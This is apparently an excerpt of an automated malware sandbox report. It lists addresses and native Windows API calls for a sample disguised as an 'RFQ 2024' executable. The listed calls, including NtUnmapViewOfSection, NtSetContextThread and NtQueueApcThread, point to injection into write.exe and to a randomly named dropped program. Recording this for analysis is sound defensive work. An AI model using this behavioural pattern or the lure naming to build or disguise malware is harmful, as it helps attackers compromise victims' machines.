Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642CD0 NtEnumerateKey,	2_2_01642CD0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01643C90 NtOpenThread,	2_2_01643C90
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642F30 NtOpenDirectoryObject,	2_2_01642F30
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642F00 NtCreateFile,	2_2_01642F00
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642FB0 NtSetValueKey,	2_2_01642FB0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642E50 NtCreateSection,	2_2_01642E50
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642E00 NtQueueApcThread,	2_2_01642E00
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642EC0 NtQuerySection,	2_2_01642EC0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642ED0 NtResumeThread,	2_2_01642ED0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642EB0 NtProtectVirtualMemory,	2_2_01642EB0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01642E80 NtCreateProcessEx,	2_2_01642E80
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA34E0 NtCreateMutant,LdrInitializeThunk,	4_2_04FA34E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA4570 NtSuspendThread,LdrInitializeThunk,	4_2_04FA4570
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA4260 NtSetContextThread,LdrInitializeThunk,	4_2_04FA4260
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2CF0 NtDelayExecution,LdrInitializeThunk,	4_2_04FA2CF0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2C50 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04FA2C50
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_04FA2C30
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2DA0 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04FA2DA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04FA2D10
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2ED0 NtResumeThread,LdrInitializeThunk,	4_2_04FA2ED0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2E50 NtCreateSection,LdrInitializeThunk,	4_2_04FA2E50
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2E00 NtQueueApcThread,LdrInitializeThunk,	4_2_04FA2E00
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2F00 NtCreateFile,LdrInitializeThunk,	4_2_04FA2F00
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA38D0 NtGetContextThread,LdrInitializeThunk,	4_2_04FA38D0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA29F0 NtReadFile,LdrInitializeThunk,	4_2_04FA29F0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2AC0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04FA2AC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2A80 NtClose,LdrInitializeThunk,	4_2_04FA2A80
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2A10 NtWriteFile,LdrInitializeThunk,	4_2_04FA2A10
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2BC0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04FA2BC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04FA2B90
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2B80 NtCreateKey,LdrInitializeThunk,	4_2_04FA2B80
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04FA2B10
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2B00 NtQueryValueKey,LdrInitializeThunk,	4_2_04FA2B00
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2CD0 NtEnumerateKey,	4_2_04FA2CD0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA3C90 NtOpenThread,	4_2_04FA3C90
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA3C30 NtOpenProcessToken,	4_2_04FA3C30
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2C20 NtSetInformationFile,	4_2_04FA2C20
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2C10 NtOpenProcess,	4_2_04FA2C10
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2DC0 NtAdjustPrivilegesToken,	4_2_04FA2DC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2D50 NtWriteVirtualMemory,	4_2_04FA2D50
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2EC0 NtQuerySection,	4_2_04FA2EC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2EB0 NtProtectVirtualMemory,	4_2_04FA2EB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2E80 NtCreateProcessEx,	4_2_04FA2E80
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2FB0 NtSetValueKey,	4_2_04FA2FB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2F30 NtOpenDirectoryObject,	4_2_04FA2F30
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA29D0 NtWaitForSingleObject,	4_2_04FA29D0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2AA0 NtQueryInformationFile,	4_2_04FA2AA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2BE0 NtQueryVirtualMemory,	4_2_04FA2BE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA2B20 NtQueryInformationProcess,	4_2_04FA2B20
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3F11D NtQueryInformationProcess,NtReadVirtualMemory,	4_2_04E3F11D
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3FC77 NtSetContextThread,	4_2_04E3FC77
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3F798 NtMapViewOfSection,	4_2_04E3F798
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3F128 NtQueryInformationProcess,	4_2_04E3F128

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068D0F34	0_2_068D0F34
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068D30B0	0_2_068D30B0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068D0F25	0_2_068D0F25
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068DAD90	0_2_068DAD90
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068DADA0	0_2_068DADA0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_068DED40	0_2_068DED40
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D39278	0_2_06D39278
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D378A8	0_2_06D378A8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D35F90	0_2_06D35F90
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D35FA0	0_2_06D35FA0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D355F0	0_2_06D355F0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D33D88	0_2_06D33D88
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 0_2_06D33960	0_2_06D33960
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00418583	2_2_00418583
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00410003	2_2_00410003
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040282F	2_2_0040282F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00402830	2_2_00402830
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040E083	2_2_0040E083
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00403210	2_2_00403210
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0042EAF3	2_2_0042EAF3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00402CDC	2_2_00402CDC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00402CE0	2_2_00402CE0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_004025C0	2_2_004025C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040FDDB	2_2_0040FDDB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0040FDE3	2_2_0040FDE3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0041674F	2_2_0041674F
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_00416753	2_2_00416753
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0165717A	2_2_0165717A
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FF113	2_2_015FF113
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AD130	2_2_016AD130
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016D010E	2_2_016D010E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B1E0	2_2_0162B1E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016151C0	2_2_016151C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BE076	2_2_016BE076
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C70F1	2_2_016C70F1
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161B0D0	2_2_0161B0D0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016000A0	2_2_016000A0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0164508C	2_2_0164508C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CF330	2_2_016CF330
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161E310	2_2_0161E310
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01601380	2_2_01601380
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C124C	2_2_016C124C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015FD2EC	2_2_015FD2EC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DA526	2_2_016DA526
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CF5C9	2_2_016CF5C9
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C75C6	2_2_016C75C6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610445	2_2_01610445
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0167D480	2_2_0167D480
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01612760	2_2_01612760
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161A760	2_2_0161A760
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C6757	2_2_016C6757
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01634670	2_2_01634670
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BD646	2_2_016BD646
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AD62C	2_2_016AD62C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162C600	2_2_0162C600
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160C6E0	2_2_0160C6E0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016836EC	2_2_016836EC
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CF6F6	2_2_016CF6F6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CA6C0	2_2_016CA6C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610680	2_2_01610680
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016559C0	2_2_016559C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160E9A0	2_2_0160E9A0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CE9A6	2_2_016CE9A6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01619870	2_2_01619870
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162B870	2_2_0162B870
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CF872	2_2_016CF872
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_015F6868	2_2_015F6868
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016B0835	2_2_016B0835
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01613800	2_2_01613800
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0163E810	2_2_0163E810
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C78F3	2_2_016C78F3
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016128C0	2_2_016128C0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C18DA	2_2_016C18DA
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016898B2	2_2_016898B2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01626882	2_2_01626882
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CFB2E	2_2_016CFB2E
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610B10	2_2_01610B10
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0164DB19	2_2_0164DB19
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01684BC0	2_2_01684BC0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CEA5B	2_2_016CEA5B
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CCA13	2_2_016CCA13
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162FAA0	2_2_0162FAA0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CFA89	2_2_016CFA89
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01610D69	2_2_01610D69
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C7D4C	2_2_016C7D4C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CFD27	2_2_016CFD27
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0160AD00	2_2_0160AD00
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016AFDF4	2_2_016AFDF4
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01619DD0	2_2_01619DD0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01622DB0	2_2_01622DB0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01613C60	2_2_01613C60
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C6C69	2_2_016C6C69
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CEC60	2_2_016CEC60
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016BEC4C	2_2_016BEC4C
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161AC20	2_2_0161AC20
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01600C12	2_2_01600C12
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0162FCE0	2_2_0162FCE0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016DACEB	2_2_016DACEB
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01628CDF	2_2_01628CDF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016A9C98	2_2_016A9C98
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CFF63	2_2_016CFF63
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_0161CF00	2_2_0161CF00
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01616FE0	2_2_01616FE0
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C1FC6	2_2_016C1FC6
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016CEFBF	2_2_016CEFBF
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016B0E6D	2_2_016B0E6D
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01652E48	2_2_01652E48
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01630E50	2_2_01630E50
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01602EE8	2_2_01602EE8
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C9ED2	2_2_016C9ED2
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_016C0EAD	2_2_016C0EAD
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: 2_2_01611EB2	2_2_01611EB2
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4509B	3_2_02C4509B
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C65B5C	3_2_02C65B5C
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4706C	3_2_02C4706C
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C46E44	3_2_02C46E44
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C46E4C	3_2_02C46E4C
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4D7BC	3_2_02C4D7BC
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4D7B8	3_2_02C4D7B8
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Code function: 3_2_02C4F5E1	3_2_02C4F5E1
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0503A526	4_2_0503A526
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F70445	4_2_04F70445
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_050275C6	4_2_050275C6
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502F5C9	4_2_0502F5C9
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FE36EC	4_2_04FE36EC
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F6C6E0	4_2_04F6C6E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05026757	4_2_05026757
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F70680	4_2_04F70680
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F94670	4_2_04F94670
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F8C600	4_2_04F8C600
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0500D62C	4_2_0500D62C
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0501D646	4_2_0501D646
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F72760	4_2_04F72760
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F7A760	4_2_04F7A760
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502A6C0	4_2_0502A6C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502F6F6	4_2_0502F6F6
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0503010E	4_2_0503010E
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F7B0D0	4_2_04F7B0D0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0500D130	4_2_0500D130
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F600A0	4_2_04F600A0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FA508C	4_2_04FA508C
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F8B1E0	4_2_04F8B1E0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F751C0	4_2_04F751C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0501E076	4_2_0501E076
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FB717A	4_2_04FB717A
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F5F113	4_2_04F5F113
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_050270F1	4_2_050270F1
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F5D2EC	4_2_04F5D2EC
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502F330	4_2_0502F330
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502124C	4_2_0502124C
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F61380	4_2_04F61380
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F7E310	4_2_04F7E310
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F8FCE0	4_2_04F8FCE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502FD27	4_2_0502FD27
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F88CDF	4_2_04F88CDF
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05027D4C	4_2_05027D4C
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F73C60	4_2_04F73C60
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F7AC20	4_2_04F7AC20
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F60C12	4_2_04F60C12
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0500FDF4	4_2_0500FDF4
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F79DD0	4_2_04F79DD0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F82DB0	4_2_04F82DB0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0501EC4C	4_2_0501EC4C
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502EC60	4_2_0502EC60
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05026C69	4_2_05026C69
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05009C98	4_2_05009C98
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F70D69	4_2_04F70D69
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0503ACEB	4_2_0503ACEB
